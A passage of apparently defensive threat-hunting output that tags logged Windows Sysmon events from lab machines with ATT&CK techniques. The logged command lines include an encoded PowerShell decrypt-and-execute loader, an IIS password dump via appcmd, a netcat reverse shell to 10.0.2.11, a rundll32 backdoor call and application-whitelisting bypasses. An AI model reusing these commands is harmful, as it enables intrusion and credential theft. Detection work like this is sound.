"C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1589239346.761944,2020-05-12T03:22:26.761944+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 142033 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-11 23:22:26.451 + 747F3D96-DE32-5EB9-0000-00103FC14300 + 5252 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-5461-5EBA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 580 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5435 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 12:06:55.471 + 747F3D96-78DF-5D45-0000-0010EF400401 + 4320 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-78DF-5D45-0000-0010BD350401 + 5756 + C:\Windows\System32\Dism.exe + "C:\Windows\system32\dism.exe" /online /norestart /apply-unattend:"C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1628379182.783518,2021-08-08T03:33:02.783518+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556726 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.121 + 747F3D96-182D-610F-0000-00100344D300 + 11196 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-90AF-610F-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 632 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1603490287.601524,2020-10-24T01:58:07.601524+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\schtasks.exe ) through command line ( schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.627 + 747F3D96-51D0-5F93-0000-001079C05B00 + 8572 + C:\Windows\SysWOW64\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + schtasks.exe + schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=77F125CE5840293890E1359483C7104AADE25FA7,MD5=5BD86A7193D38880F339D4AFB1F9B63A,SHA256=72900A86F3BED7570AA708657A76DD76BB80B68DB543D303DA401AC6983E39CE,IMPHASH=012D1B3C5FD8B10F0F36DB7243A28CB8 + 747F3D96-51D0-5F93-0000-0010B2B35B00 + 5572 + C:\Windows\SysWOW64\cmd.exe + "C:\Windows\System32\cmd.exe" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435988.318896,2019-07-30T01:33:08.318896+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4897 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:08.174 + 747F3D96-6614-5D3F-0000-001093CE8600 + 108 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.563997,2019-05-27T05:29:19.563997+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5964 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.513 + 365ABB72-3D6F-5CEB-0000-0010CFCAFF00 + 3892 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Line Number: 0" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589239343.719794,2020-05-12T03:22:23.719794+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 141993 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-11 23:21:56.654 + 747F3D96-DE14-5EB9-0000-001079154300 + 224 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + c:\Users\IEUser\tools\PrivEsc\ + NT AUTHORITY\SYSTEM + 747F3D96-5461-5EBA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-DE14-5EB9-0000-00107C0F4300 + 4468 + C:\Users\IEUser\Tools\Misc\nc64.exe + c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243520 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.533 + 747F3D96-9F61-5E75-0000-00103D6F1E00 + 7124 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243520 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.533 + 747F3D96-9F61-5E75-0000-00103D6F1E00 + 7124 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556720 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.091 + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + MSHTA.EXE + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 + 747F3D96-1239-610F-0000-0010D0210A00 + 600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766818.011502,2020-03-21T09:00:18.011502+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243520 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.533 + 747F3D96-9F61-5E75-0000-00103D6F1E00 + 7124 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556720 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.091 + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + MSHTA.EXE + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 + 747F3D96-1239-610F-0000-0010D0210A00 + 600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1628379181.118316,2021-08-08T03:33:01.118316+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line ("C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}) and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\Explorer.EXE) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 556720 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-08-07 23:33:01.091 + 747F3D96-182D-610F-0000-00106F40D300 + 9932 + C:\Windows\SysWOW64\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + MSHTA.EXE + "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\memViewData.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1231-610F-0000-002057A80700 + 0x7a857 + 1 + Medium + SHA1=EE1ED6AEA892E2ABCFA64D9D51078EFDFAEA6253,MD5=4DBAFC3C0B7A9CAA67D6C2C3D99422F2,SHA256=12C94C614FB752DC1F6797B5FB3AD67719E3C924FACDA35DC36792C8E5AC45FC,IMPHASH=4CB8A74361E70A5FF774A0A1A7C65989 + 747F3D96-1239-610F-0000-0010D0210A00 + 600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.473868,2019-05-27T05:29:19.473868+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( 